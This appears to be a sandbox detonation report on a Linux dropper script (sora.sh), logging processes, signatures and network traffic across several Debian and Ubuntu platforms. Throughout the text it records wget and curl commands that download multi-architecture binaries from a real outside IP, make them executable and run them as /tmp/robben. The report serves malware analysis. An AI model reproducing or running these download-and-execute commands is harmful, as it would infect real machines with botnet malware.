[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x gdm3-config-err-QIRJD0 gdm3-config-err-wcrE8Z robben snap-private-tmp sora.sh systemd-private-63b463d3ddba46c5ba725f65aeb475e2-ModemManager.service-TEoeYq systemd-private-63b463d3ddba46c5ba725f65aeb475e2-colord.service-wvHScB systemd-private-63b463d3ddba46c5ba725f65aeb475e2-polkit.service-UYaRS8 systemd-private-63b463d3ddba46c5ba725f65aeb475e2-power-profiles-daemon.service-3glfDe systemd-private-63b463d3ddba46c5ba725f65aeb475e2-switcheroo-control.service-FGLkHU systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-logind.service-u4tSEY systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-oomd.service-tBUdsa systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-resolved.service-cCtFlD systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-timedated.service-BromBo systemd-private-63b463d3ddba46c5ba725f65aeb475e2-upower.service-GUSHRK]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x gdm3-config-err-QIRJD0 gdm3-config-err-wcrE8Z robben snap-private-tmp sora.sh systemd-private-63b463d3ddba46c5ba725f65aeb475e2-ModemManager.service-TEoeYq systemd-private-63b463d3ddba46c5ba725f65aeb475e2-colord.service-wvHScB systemd-private-63b463d3ddba46c5ba725f65aeb475e2-polkit.service-UYaRS8 systemd-private-63b463d3ddba46c5ba725f65aeb475e2-power-profiles-daemon.service-3glfDe systemd-private-63b463d3ddba46c5ba725f65aeb475e2-switcheroo-control.service-FGLkHU systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-logind.service-u4tSEY systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-oomd.service-tBUdsa systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-resolved.service-cCtFlD systemd-private-63b463d3ddba46c5ba725f65aeb475e2-upower.service-GUSHRK]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | _http._tcp.security.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 91.189.91.81:80 | security.ubuntu.com | tcp |
| SE | 194.71.11.165:80 | se.archive.ubuntu.com | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
debian9-mipsbe-20240418-en
Max time kernel
300s
Max time network
283s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian9-mipsel-20240611-en
Max time kernel
247s
Max time network
281s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
290s
Max time network
298s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x config-err-iEKf7O netplan_e2yeal45 robben snap-private-tmp sora.sh ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-hSixl4]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-iEKf7O netplan_e2yeal45 robben snap-private-tmp sora.sh ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-hSixl4]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| GB | 89.187.167.5:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 158.51.127.106:80 | | tcp |
| GB | 84.17.50.8:443 | 1527653184.rsc.cdn77.org | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.96:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | daisy.ubuntu.com | udp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
223s
Max time network
292s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-timedated.service-HCpxDg systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.17:80 | connectivity-check.ubuntu.com | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |